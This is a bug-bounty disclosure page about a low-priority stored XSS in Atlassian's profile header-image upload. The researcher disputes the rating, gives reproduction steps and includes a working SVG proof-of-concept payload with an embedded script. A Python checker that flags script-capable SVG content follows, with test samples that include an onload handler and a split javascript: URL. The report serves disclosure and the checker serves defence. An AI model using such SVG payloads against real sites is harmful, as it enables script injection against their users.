XSS Vulnerability of upload SVG files in a collection section that triggers XSS

Disclosed by MR_ZHEEV
  • Engagement: Atlassian
  • Disclosed date: about 5 years ago
  • Priority: P5 (Bugcrowd's VRT priority rating)
  • Status: Informational (this vulnerability is seen as an accepted business risk)
Summary by Atlassian

XSS vulnerability of upload SVG files in start.atlassian.com

Summary by MR_ZHEEV

Don't my findings fall into the P4 category? I have reported websites with loopholes like this on several platforms, for example (H1). This is a rather serious problem, and I find that on the account section it has a rather serious impact because it is exploited via SVG files. I have come across and reported websites like this more than once, and they usually get P3 & P4.

Report details
  • Submitted

  • Target Location

    Atlassian Identity (https://id.atlassian.com/login)
  • Target category

    Web App

  • VRT

    Cross-Site Scripting (XSS) > Stored > Self
  • Priority

    P5
  • Bug URL
    https://id.atlassian.com/manage-profile/profile-and-visibility
  • Description

    Hi team,
    I found an XSS vulnerability of upload SVG files in a collection section that triggers XSS.

    1. Go to start.atlassian.com
    2. Then select manage profile
    3. Then select update your header image
    4. Then add the image to the image collection with the XSS SVG file
    5. Right click and see the XSS image; the XSS via the SVG file is executed

    Payload, saved in SVG format:

    <?xml version="1.0" standalone="no"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
    <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
    <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
    <script type="text/javascript">
    alert(document.domain);
    </script>
    </svg>

    Impact
    Allowing uploads in the SVG format creates an XSS vulnerability.
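
A server-side check for the upload path described in this report, as an added example that is not part of the original report or Atlassian's code: it parses an uploaded SVG and lists the script-capable content (active elements, `on*` handlers, URLs outside an allowlist) that should block storing or serving the file inline. The function names, element set and URL allowlist are assumptions chosen for illustration.

```python
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
# Elements that run script or pull in non-SVG documents (assumed set).
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object"}
# URL values accepted in href/src: same-document fragments, http(s), raster data URIs.
SAFE_URL = re.compile(r"^(#|https?://|data:image/(png|jpeg|gif)[;,])", re.I)

def local(name):
    """Drop the '{namespace}' prefix ElementTree puts on tag and attribute names."""
    return name.rsplit("}", 1)[-1]

def find_active_content(svg_bytes):
    """Return the reasons an uploaded SVG should not be stored or served as-is."""
    if b"<!ENTITY" in svg_bytes.upper():
        return ["DTD entity declaration"]  # refuse before parsing
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    if root.tag != f"{{{SVG_NS}}}svg":
        findings.append("root is not <svg> in the SVG namespace")
    for el in root.iter():
        tag = local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            name = local(attr).lower()
            if name.startswith("on"):
                findings.append(f"{name} handler on <{tag}>")
            # Whitespace is removed first so a split scheme name cannot slip through.
            elif name in ("href", "src") and not SAFE_URL.match("".join(value.split())):
                findings.append(f"disallowed URL in {name} on <{tag}>")
    return findings

# The payload from the report above, plus two constructed files for contrast.
REPORTED = (b'<?xml version="1.0" standalone="no"?>'
            b'<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">'
            b'<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">'
            b'<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>'
            b'<script type="text/javascript">alert(document.domain);</script></svg>')
BENIGN = b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="9" height="9" fill="#009900"/></svg>'
HANDLER = b'<svg xmlns="http://www.w3.org/2000/svg" onload="void 0"><a href="java\nscript:void 0"/></svg>'

if __name__ == "__main__":
    for label, doc in (("reported", REPORTED), ("benign", BENIGN), ("handler", HANDLER)):
        print(label, find_active_content(doc))
```

Files with findings can be rejected or rasterized before storage. Serving user uploads with `Content-Disposition: attachment` or from a separate origin limits the impact of anything the check misses.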
